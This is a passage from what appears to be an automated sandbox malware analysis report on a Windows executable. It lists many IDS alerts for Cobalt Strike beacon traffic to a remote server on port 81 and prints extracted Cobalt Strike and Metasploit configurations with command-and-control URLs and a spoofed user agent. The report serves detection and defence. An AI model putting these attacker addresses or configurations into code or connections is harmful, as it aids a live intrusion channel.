2025-01-09T23:10:01.687567+0100	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	50157	47.121.190.121	81	TCP
2025-01-09T23:10:02.764362+0100	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	50158	47.121.190.121	81	TCP
2025-01-09T23:10:03.902602+0100	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	50159	47.121.190.121	81	TCP
2025-01-09T23:10:04.988274+0100	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	50160	47.121.190.121	81	TCP
2025-01-09T23:10:06.041816+0100	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	50161	47.121.190.121	81	TCP
2025-01-09T23:10:07.104289+0100	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	50162	47.121.190.121	81	TCP
2025-01-09T23:10:08.215749+0100	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	50163	47.121.190.121	81	TCP
2025-01-09T23:10:09.292722+0100	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	50164	47.121.190.121	81	TCP
2025-01-09T23:10:10.362812+0100	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	50165	47.121.190.121	81	TCP
2025-01-09T23:10:11.451556+0100	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	50166	47.121.190.121	81	TCP
2025-01-09T23:10:12.535947+0100	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	50167	47.121.190.121	81	TCP
2025-01-09T23:10:13.643758+0100	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	50168	47.121.190.121	81	TCP
2025-01-09T23:10:14.719532+0100	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	50169	47.121.190.121	81	TCP
2025-01-09T23:10:15.779461+0100	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	50170	47.121.190.121	81	TCP
2025-01-09T23:10:16.845496+0100	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	50171	47.121.190.121	81	TCP
2025-01-09T23:10:17.901547+0100	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	50172	47.121.190.121	81	TCP
2025-01-09T23:10:18.969304+0100	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	50173	47.121.190.121	81	TCP
2025-01-09T23:10:20.020527+0100	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	50174	47.121.190.121	81	TCP
2025-01-09T23:10:21.095492+0100	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	50175	47.121.190.121	81	TCP
2025-01-09T23:10:22.147598+0100	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	50176	47.121.190.121	81	TCP
2025-01-09T23:10:23.200153+0100	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	50177	47.121.190.121	81	TCP
2025-01-09T23:10:24.302444+0100	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	50178	47.121.190.121	81	TCP
2025-01-09T23:10:25.460376+0100	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	50179	47.121.190.121	81	TCP
2025-01-09T23:10:26.513953+0100	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	50180	47.121.190.121	81	TCP
2025-01-09T23:10:27.607746+0100	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	50181	47.121.190.121	81	TCP
2025-01-09T23:10:28.689992+0100	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	50182	47.121.190.121	81	TCP
2025-01-09T23:10:29.749808+0100	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	50183	47.121.190.121	81	TCP
2025-01-09T23:10:30.812475+0100	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	50184	47.121.190.121	81	TCP
2025-01-09T23:10:31.863180+0100	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	50185	47.121.190.121	81	TCP
2025-01-09T23:10:32.953635+0100	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	50186	47.121.190.121	81	TCP
2025-01-09T23:10:34.075897+0100	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	50187	47.121.190.121	81	TCP
2025-01-09T23:10:35.171919+0100	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	50188	47.121.190.121	81	TCP
2025-01-09T23:10:36.229509+0100	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	50189	47.121.190.121	81	TCP
2025-01-09T23:10:37.283224+0100	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	50190	47.121.190.121	81	TCP
2025-01-09T23:10:38.336978+0100	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	50191	47.121.190.121	81	TCP
2025-01-09T23:10:39.413620+0100	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	50192	47.121.190.121	81	TCP
2025-01-09T23:10:40.483638+0100	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	50193	47.121.190.121	81	TCP
2025-01-09T23:10:41.529468+0100	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	50194	47.121.190.121	81	TCP
2025-01-09T23:10:42.614080+0100	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	50195	47.121.190.121	81	TCP
2025-01-09T23:10:43.693459+0100	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	50196	47.121.190.121	81	TCP
2025-01-09T23:10:44.769386+0100	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	50197	47.121.190.121	81	TCP
2025-01-09T23:10:45.838150+0100	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	50198	47.121.190.121	81	TCP
2025-01-09T23:10:46.905002+0100	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	50199	47.121.190.121	81	TCP
2025-01-09T23:10:48.170618+0100	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	50200	47.121.190.121	81	TCP
2025-01-09T23:10:49.232009+0100	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	50201	47.121.190.121	81	TCP
2025-01-09T23:10:50.315464+0100	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	50202	47.121.190.121	81	TCP
2025-01-09T23:10:51.365714+0100	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	50203	47.121.190.121	81	TCP
2025-01-09T23:10:52.456858+0100	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	50204	47.121.190.121	81	TCP
2025-01-09T23:10:53.516487+0100	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	50205	47.121.190.121	81	TCP
2025-01-09T23:10:54.607904+0100	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	50206	47.121.190.121	81	TCP
2025-01-09T23:10:55.687630+0100	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	50207	47.121.190.121	81	TCP
2025-01-09T23:10:56.768150+0100	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	50208	47.121.190.121	81	TCP
2025-01-09T23:10:57.865174+0100	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	50209	47.121.190.121	81	TCP
2025-01-09T23:10:58.940968+0100	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	50210	47.121.190.121	81	TCP
2025-01-09T23:11:00.020036+0100	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	50211	47.121.190.121	81	TCP
2025-01-09T23:11:01.097549+0100	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	50212	47.121.190.121	81	TCP
2025-01-09T23:11:02.185724+0100	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	50213	47.121.190.121	81	TCP
2025-01-09T23:11:03.430333+0100	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	50214	47.121.190.121	81	TCP
2025-01-09T23:11:04.483712+0100	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	50215	47.121.190.121	81	TCP
2025-01-09T23:11:05.608070+0100	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	50216	47.121.190.121	81	TCP

ET MALWARE Successful Cobalt Strike Shellcode Download (x64) M1

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-09T23:07:00.873845+0100	2035442	1	A Network Trojan was detected	47.121.190.121	81	192.168.2.4	49730	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: THsSNYblMw.exe

Avira: detected

Found malware configuration

Source: 00000000.00000002.4147448292.00000000001B0000.00000020.00001000.00020000.00000000.sdmp	Malware Configuration Extractor: CobaltStrike {"C2Server": "http://7.121.190.121:81/aGDq", "User Agent": "User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; Avant Browser)\r\n"}
Source: 00000000.00000002.4147448292.00000000001B0000.00000020.00001000.00020000.00000000.sdmp	Malware Configuration Extractor: Metasploit {"Headers": "User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; Avant Browser)\r\n", "Type": "Metasploit Download", "URL": "http://47.121.190.121/aGDq"}

Multi AV Scanner detection for submitted file

Source: THsSNYblMw.exe

ReversingLabs: Detection: 76%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for sample

Source: THsSNYblMw.exe

Joe Sandbox ML: detected

Source: C:\Users\user\Desktop\THsSNYblMw.exe	Code function: 0_2_006A1184 CryptAcquireContextA,CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,		0_2_006A1184
Source: C:\Users\user\Desktop\THsSNYblMw.exe	Code function: 0_2_006D0020 CryptGenRandom,		0_2_006D0020

Source: C:\Users\user\Desktop\THsSNYblMw.exe	Code function: 0_2_006B780C malloc,_snprintf,FindFirstFileA,free,malloc,_snprintf,free,FindNextFileA,FindClose,		0_2_006B780C
Source: C:\Users\user\Desktop\THsSNYblMw.exe	Code function: 0_2_006B0F28 malloc,GetCurrentDirectoryA,FindFirstFileA,GetLastError,free,free,FileTimeToSystemTime,SystemTimeToTzSpecificLocalTime,FindNextFileA,FindClose,		0_2_006B0F28

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49765 -> 47.121.190.121:81
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49732 -> 47.121.190.121:81
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49743 -> 47.121.190.121:81
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49752 -> 47.121.190.121:81
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49747 -> 47.121.190.121:81
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49761 -> 47.121.190.121:81
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49758 -> 47.121.190.121:81
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49735 -> 47.121.190.121:81
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49762 -> 47.121.190.121:81
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49731 -> 47.121.190.121:81
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49766 -> 47.121.190.121:81
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49763 -> 47.121.190.121:81
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49754 -> 47.121.190.121:81
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49738 -> 47.121.190.121:81
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49756 -> 47.121.190.121:81
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49733 -> 47.121.190.121:81
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49768 -> 47.121.190.121:81
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49764 -> 47.121.190.121:81
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49740 -> 47.121.190.121:81
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49736 -> 47.121.190.121:81
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49734 -> 47.121.190.121:81
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49739 -> 47.121.190.121:81
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49751 -> 47.121.190.121:81
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49759 -> 47.121.190.121:81
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49760 -> 47.121.190.121:81
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49741 -> 47.121.190.121:81
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49737 -> 47.121.190.121:81
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49749 -> 47.121.190.121:81
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49753 -> 47.121.190.121:81
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49767 -> 47.121.190.121:81
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49770 -> 47.121.190.121:81
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49777 -> 47.121.190.121:81
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49775 -> 47.121.190.121:81
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49773 -> 47.121.190.121:81
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49769 -> 47.121.190.121:81
Source: Network traffic	Suricata IDS: 2035442 - Severity 1 - ET MALWARE Successful Cobalt Strike Shellcode Download (x64) M1 : 47.121.190.121:81 -> 192.168.2.4:49730
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49774 -> 47.121.190.121:81
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49784 -> 47.121.190.121:81
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49771 -> 47.121.190.121:81
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49780 -> 47.121.190.121:81
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49776 -> 47.121.190.121:81
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49782 -> 47.121.190.121:81
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49779 -> 47.121.190.121:81
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49755 -> 47.121.190.121:81
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49812 -> 47.121.190.121:81
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49778 -> 47.121.190.121:81
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49786 -> 47.121.190.121:81
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49757 -> 47.121.190.121:81
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49841 -> 47.121.190.121:81
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49857 -> 47.121.190.121:81
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49781 -> 47.121.190.121:81
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49835 -> 47.121.190.121:81
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49864 -> 47.121.190.121:81
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49871 -> 47.121.190.121:81
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49772 -> 47.121.190.121:81
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49825 -> 47.121.190.121:81
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49818 -> 47.121.190.121:81
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49850 -> 47.121.190.121:81
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49906 -> 47.121.190.121:81
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49915 -> 47.121.190.121:81
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49922 -> 47.121.190.121:81
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49928 -> 47.121.190.121:81
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49936 -> 47.121.190.121:81
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49952 -> 47.121.190.121:81
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49942 -> 47.121.190.121:81
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49982 -> 47.121.190.121:81
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49967 -> 47.121.190.121:81
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50006 -> 47.121.190.121:81
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49993 -> 47.121.190.121:81
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49976 -> 47.121.190.121:81
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50013 -> 47.121.190.121:81
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49959 -> 47.121.190.121:81
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50020 -> 47.121.190.121:81
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50041 -> 47.121.190.121:81
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50058 -> 47.121.190.121:81
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50087 -> 47.121.190.121:81
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50093 -> 47.121.190.121:81
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50082 -> 47.121.190.121:81
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50103 -> 47.121.190.121:81
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50086 -> 47.121.190.121:81
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50105 -> 47.121.190.121:81
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50108 -> 47.121.190.121:81
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50097 -> 47.121.190.121:81
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50110 -> 47.121.190.121:81
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50119 -> 47.121.190.121:81
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50088 -> 47.121.190.121:81
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50085 -> 47.121.190.121:81
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50089 -> 47.121.190.121:81
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50109 -> 47.121.190.121:81
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50132 -> 47.121.190.121:81
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50117 -> 47.121.190.121:81
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50091 -> 47.121.190.121:81
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50102 -> 47.121.190.121:81
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50135 -> 47.121.190.121:81
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50094 -> 47.121.190.121:81
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50104 -> 47.121.190.121:81
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50101 -> 47.121.190.121:81
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50111 -> 47.121.190.121:81
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50112 -> 47.121.190.121:81
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50133 -> 47.121.190.121:81
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50145 -> 47.121.190.121:81
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50123 -> 47.121.190.121:81
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50131 -> 47.121.190.121:81
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50096 -> 47.121.190.121:81
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50136 -> 47.121.190.121:81
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50113 -> 47.121.190.121:81
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50095 -> 47.121.190.121:81
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50164 -> 47.121.190.121:81
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50156 -> 47.121.190.121:81
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50107 -> 47.121.190.121:81
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50125 -> 47.121.190.121:81
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49999 -> 47.121.190.121:81
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50116 -> 47.121.190.121:81
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50179 -> 47.121.190.121:81
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50161 -> 47.121.190.121:81
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50166 -> 47.121.190.121:81
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50138 -> 47.121.190.121:81
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50199 -> 47.121.190.121:81
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50193 -> 47.121.190.121:81
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50092 -> 47.121.190.121:81
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50026 -> 47.121.190.121:81
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50129 -> 47.121.190.121:81
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50176 -> 47.121.190.121:81
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50114 -> 47.121.190.121:81
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50118 -> 47.121.190.121:81
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50169 -> 47.121.190.121:81
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50035 -> 47.121.190.121:81
